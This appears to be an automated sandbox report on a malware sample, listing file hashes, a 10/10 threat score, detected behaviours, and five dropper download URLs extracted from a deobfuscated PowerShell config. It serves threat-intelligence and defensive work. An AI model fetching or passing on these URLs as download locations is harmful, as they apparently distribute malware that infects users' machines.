General

  • Target

    75b5887bf105e8c270a980a1122802d3_JaffaCakes118

  • Size

    81KB

  • Sample

    240526-ra6f6ahf55

  • MD5

    75b5887bf105e8c270a980a1122802d3

  • SHA1

    20bba6c529a1036e4252b9dd86c1a06f92221def

  • SHA256

    c57bc62f944a858d7b6b1e2ff89f50f466b260cf79385517cc9c108d9b244530

  • SHA512

    c49447e19f9dd885af05e67e8224f94f4a74c89f3104b11d0bfe6c74de61f7e41a393cba6e99329e34cd70e0133e017f30aefaffd97a1664b47900ff2bbb4998

  • SSDEEP

    1536:TptJlmrJpmxlRw99NB3+aEYvycIfhHfFUnRA5xuM:dte2dw99flJmfF6ex

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://michiganbusiness.us/jBE6

exe.dropper

http://ingridkaslik.com/8

exe.dropper

http://drdelaluz.com/Q7s1

exe.dropper

http://milehighffa.com/cqZHO01V

exe.dropper

http://avto-baki.ru/Ph9j

Targets

    • Target

      75b5887bf105e8c270a980a1122802d3_JaffaCakes118

    • Size

      81KB

    • MD5

      75b5887bf105e8c270a980a1122802d3

    • SHA1

      20bba6c529a1036e4252b9dd86c1a06f92221def

    • SHA256

      c57bc62f944a858d7b6b1e2ff89f50f466b260cf79385517cc9c108d9b244530

    • SHA512

      c49447e19f9dd885af05e67e8224f94f4a74c89f3104b11d0bfe6c74de61f7e41a393cba6e99329e34cd70e0133e017f30aefaffd97a1664b47900ff2bbb4998

    • SSDEEP

      1536:TptJlmrJpmxlRw99NB3+aEYvycIfhHfFUnRA5xuM:dte2dw99flJmfF6ex

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks